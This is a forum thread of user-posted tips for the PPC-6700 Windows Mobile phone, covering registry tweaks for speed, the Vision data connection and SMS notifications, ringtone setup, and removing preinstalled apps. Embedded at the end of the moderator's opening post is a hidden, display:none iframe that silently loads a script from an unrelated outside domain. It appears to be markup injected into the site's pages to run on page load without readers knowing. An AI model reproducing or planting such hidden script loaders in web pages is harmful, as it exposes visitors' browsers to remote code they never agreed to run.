+ Reply to Thread
Page 1 of 8 1 2 3 4 5 ... LastLast

6700 Tips & Tricks - READ 1ST POST BEFORE POSTING TO THIS THREAD!!

Ok guys, I have edited out all the extaneous posts from this thread and left only the information I felt was most useful. Couple of things you need to keep in mind BEFORE posting to this thread:

1. This thread is for solutions/tips/tricks ONLY!! It is NOT for asking random questions or troubleshooting technical problems with your 6700.

2. If you have a question regarding a hack/tip/trick posted in this thread, do not post it here. All the hacks/tips/tricks posted in this thread have their own dedicated threads in the forum so you should locate that thread and post to it. If you search and cannot find it, start a new thread.

3. If you have an unrelated, specific issue you need resolved, you should search the forum for a relevant thread and post in that thread. If you cannot find one, then start a new thread. If you post a problem to this thread asking for troubleshooting assistance, I will delete it without notice. This thread is ONLY for posting 6700 tips and tricks that you feel other people will find useful, nothing more.

4. AGAIN, this thread is NOT for asking questions of ANY type! It is simply for people to post tips and tricks about the 6700. If you post a question or respond to someone who posted a question, YOUR POST WILL BE DELETED WITHOUT NOTICE! These strict rules are necessary in order to keep this thread readable for others.

5. If someone posts a tip/trick that is not correct, feel free to post a correction. I will subsequently edit the post in question to reflect the correction (I will try to give you credit) and then remove your post so that all information on that particular tip/trick is kept together in a single post.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by Marty; 09-21-2006 at 02:10 AM.

Tips & Tricks

Post your tips & tricks here.

- Front buttons don't turn the device on. This is user-configurable. Go to Settings / Personal tab / Buttons / Lock tab to change this.

- Press-and-hold the IE hard button to launch the Wireless Manager app (thanks jglev for this tip!)

- I hate the way the volume slider works by default. Push and hold it down and it moves down once, then moves down rapidly. You let go and it keeps moving. Argh! You can change this. Go to Settings / Personal tab / Buttons / Up/Down Control tab. I set my Repeat rate to the slowest setting and that seems to turn repeat off. With that setting, you have to slide it and release it once for every notch you want to move up/down in adjusting the volume. I'd prefer a hard rocker switch instead of that "slider", but whaddya gonna do?

Moderators, please sticky this thread!

The Vision duration registry edit from the 6600 works on the 6700. This edit allows you to see the duration of your Vision connection along with a button to disconnect it. You see it in the bubble that is displayed when you tap the Vision icon.

Click HKEY_LOCAL_MACHINE
    Click ControlPanel
    Click Phone
    [at this point, the buttom grey status bar should read \HKLM\ControlPanel\Phone'
    Click the bottom menu 'edit'
    Select new dword value

Change the value name to "Flags2" (no quotes).
    Select the 'hexidecimal' button.
    Type 10
    Click ok.
    You should now see in the 'name/data' section:

Flags2 16 (0x00010)

When done, reset the device.
    Jeff

HTC Fuze

Tak Motorsports Racing

I think its time.... PPC-6700 Tips and Tricks!

Since everyother forum has one of these that are sticky, its time to add some for our new phone as well. Feel free to add your own as well.

MP3/WMA/WAV for Ringtones:
    Add media files into "\Windows\Rings\" folder

or

Use File Explorer and click and hold on media file and select "Set as Ringtone"

They will now be available in the phone preference section as well as the contact ringtone section.

Recommendation: Use only 15-20 second long clips for ringtones to save space. A good program to use is MP3Splitter. You can download it here.

WAV for SMS/EMAIL/Alerts/Alarms:
    Add WAV files into "\Windows\" Folder

They will now be available in the Settings>Sounds and Notifications section.

Recommendation: Use only 5-20 second long clips for Alerts to save space.

Borrowed from PPC-6600 Section
    Speed Up Your Windows Mobile Pocket PC.

WOW my Pocket PC is fast! I just bumped into an old registry tweak that I have yet to use o_n Windows Mobile 2003. A foreign site todopocketpc had mentioned this and I was surprised I had not used it o_n my new install. o_nce I applied this reg tweak I immediately saw a difference in how fast my Windows Mobile Pocket PC responded. Today plugins load faster my Games folder loads faster. Its just an overall better experience. I would highly suggest backing up your Pocket PC before you try this as playing with your registry can cause problems if you do not know what you are doing. Protect your Pocket PC BACKUP!

If you need a registry editor, you can find a free o_ne at http://www.freewareppc.com/utilities/regeditce.shtml

1. Open your registry editor o_n your Pocket PC
    2. Navigate to HKEY_LOCAL_MACHINE\SYSTEM\GDI\GLYPHCACHE\
    3. Change the value of 'limit' from 8192 to 32768
    4. Close registry editor and soft reset.

That's it! Let me know what your results are
    I actually used 16384 instead, as it would use less memory and its a happy medium.

Registry Hack for keyboard LEDs

Open you registry editing program and go to: HKEY_Current_User, then go to Control Panel, then to Backlight, then at the bottom you'll see a key that says QKEYLED TIMEOUT.

Modify that key and change the D Word from 10 to whatever seconds you want. I have mine set for 60. After you make your change click ok, then do a soft reset. It works for me! 60 seconds seems to be for me the best setting, 10 seconds was way to short. Hope this helps!
    Here is a link to many PPC registry hacks. Click Here.

Just so you guys know, most of the registry tweaks above are included in Tweaks2k2 .NET. For ease of use, I recommend that program. The newest version works perfectly on my PPC-6700. There are many other tweaks in there as well.

Ill add more as i think of them or find them.

Mods, can we make this sticky?
    Last edited by takmsdsm; 10-06-2005 at 08:21 AM.

Tak Motorsports Racing
    Time to save a little space...

From the factory... our phones have Audible and Action Engine installed. There is no option to remove these programs. Well using a primitive way, the easiest way to get rid of that crap is simple.

Using your computer or PPC, cruise on over the the Program Files section of your handheld. Next select the folders of Audible and Action Engine. Delete them.

Next, go to the "\Windows\Start Menu\Programs\" Folder and delete the shortcuts to those programs.

Pretty simple eh. The device has dependancies on either of these programs, so we can leave their registry settings in the registry no problem, its not going to hurt anything.

I changed the glyph cache registry from 8192 to 16384 and now when I open my keypad, the switch to Landscape mode is significantly faster, almost instant. I'm sure that alone is worth the sacrifice of extra 1 MB of memory.

Tak Motorsports Racing
    Obvious one, but good for newbies....

SPB Pocket Plus and Resco File Explorer are both awesome programs. Both have plugins that can reside on the Today screen.

both are EXTREME memory hogs tho, especially if you run both at the same time. unless you need to run the today screen plugins, i recommend you disable them in the Settings>Today>Items screen.

Even with my device overclocked, it is still a noticable slowdown. With neither plugin on there, the device zips along on the today screen.

Anyone got a tip on how to keep the on-screen keyboard from popping up every time I get to a text entry field? I use it sometime, but normally would prefer to use the keyboard.

Just type with the physical keyboard and the virtual will stop popping up.

-rob

Tak Motorsports Racing
    Courtesy of rivaldo at the PPCSG.com forums:
    Getting rid of the Message Sent notification for text messaging
    for those who hates the "Message Sent" notification after sending an SMS, this is the steps to remove the bubble notification...this is the STEP by STEP method to do it in case some of you guys dont get it right...

1. First, you will need to download a Registry Editor to help you do it...

a good one will be the freeware PHM Registry Editor
    or for those who got the Resco Explorer, you can use the Registry Editor that comes with it...

2. using the Registry Editor, navigate to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Inbox

3. Next, click on Inbox (make sure the Inbox is highlighted) and select Edit, New Key

4. Name the New Key as "Settings"

5. Click on "Settings" (make sure the Settings is highlighted) and select Edit, New String Value

6. On "Value name:", key in SMSNoSentMsg and in "Value data", key in 1

7. Soft reset your device and test it with one SMS, and you will notice that the SMS Sent bubble is being disabled

do let me know if any of you guys cant get it to work...

Always On Internet (Vision) Connection

< Untested. From http://shadowmite.com/forum/viewtopic.php?t=866 >

- Change the "AlwaysOn" dword value from "0" to "1";
    -- You may be asked for your Vision ID/PW. Just leave blank.
    -- Warm Reset
    Please let me know if this works for you. I'm still testing.

KB

------------------------------------------------------------

[[HKEY_LOCAL_MACHINE\Comm\ConnMgr\Providers\{7C4B7A38-5FF7-4bc1-80F6-5DA7870BB1AA}\Connections\Sprint PCS Vision]
    "AlwaysOn"=dword:00000001
    "RequirePw"=dword:00000001
    "ConnectionGUID"="{8956986C-8ABE-ECBF-D48F-57F7DD6A7E6A}"
    "SecureLevel"=dword:00000000
    "Secure"=dword:00000000
    "Enabled"=dword:00000001
    "EntryType"=dword:00000000
    "DestId"="{F079757F-9357-4000-8305-9CA6B9B6CAEC}"

Tak Motorsports Racing
    borrowed from Helix139 on the PPC-6600 forum:

HKLM\System\StorageManager\FATFS

I changed the CacheSize key from 0 to 16384 and it seems to have sped up my ppc. not only that but BT 3900B doesnt seem to give me the memory error anymore that had begun to reoccur. give it a try and let me know what you find
    obviously you actually lose quite a bit of space with this hack with a value of 16384, around 16mb almost. I instead used 4096 as the value a 3-4mb loss, no biggie since i have a 1gb sd card). This seems to improve the speed of my PPC as well. I might try a value of 8192 here soon as well as i have plenty of space available.
    Last edited by takmsdsm; 10-05-2005 at 03:05 PM.

Tak Motorsports Racing
    Borrowed from the PPC-6600 forum:

Add a disconnect button and connection time to your vision connection bubble:
    Go to HKEY_LOCAL_MACHINE\ControlPanel\Phone
    Go to New value, then click dword value
    Name the value "Flags2" without the quotes
    Choose decimal value and enter 16 for value amount

Soft Reset and tap on the vision icon and it will show the disconnect button and connection time
    Please note: The "always on" tweak and the Disconnect button/time connected tweak will NOT work together. The always on tweak will override the other tweak and those extra options will not be shown.
    Last edited by takmsdsm; 10-05-2005 at 03:23 PM.

you need mortsaver
    Attached Files
    AT&T Tilt aka HTC Kaiser aka TyTn II
    PPC 6700 is now my TV remote control and favorite paperweight lol

or screenlock...less features though.

-jeff
    Attached Files

Originally posted by vegasman
    I have tried to download PHM Regedit several times, and when I click on the exe file, it says it is installed, but I cannot find it anywhere on the PPC6700. HELP!!!
    Thanks
    Irv
    yeah it doesn't work - transfer the .cab file in this .zip to your 6700 and execute it with file explorer. works fine.

-jeff
    Attached Files

u need to use the "explore" function of activesync to see the files on your 6700...then you need to transfer the .cab file to a folder ON your 6700...next you need to open file explorer on your 6700, find the .cab file and execute (tap) it.

-jeff

here's the file i use and it works just fine...

-jeff
    Attached Files

Originally posted by Curious Cat
    Finally installed SPB Pocket Plus. Everything went well but I noticed after changing themes that everything slowed to a crawl. It stayed slow even after I switched back to the default theme. Good news, after a soft reset it went back to normal and even stayed fast using the other themes.

Question-It seems like this program takes about 5 Mb of memory and now I only have 6.69 storage memory left. I don't have much else loaded yet. Is this normal? There's still a lot of programs I want to add.
    Try deleteing your web content in the storage tab of ie. This appears to be a huge memory hog. If you do it report back how much space you got back.

-rob

Originally posted by mooring
    sorry; where do you clear this and how often do you have to keep clearing it?
    When in IE: Menu...Tools...Options. Then hit the "Memory" tab and the "Delete Files" button.
    Jeff

HTC Fuze

+ Reply to Thread
Page 1 of 8 1 2 3 4 5 ... LastLast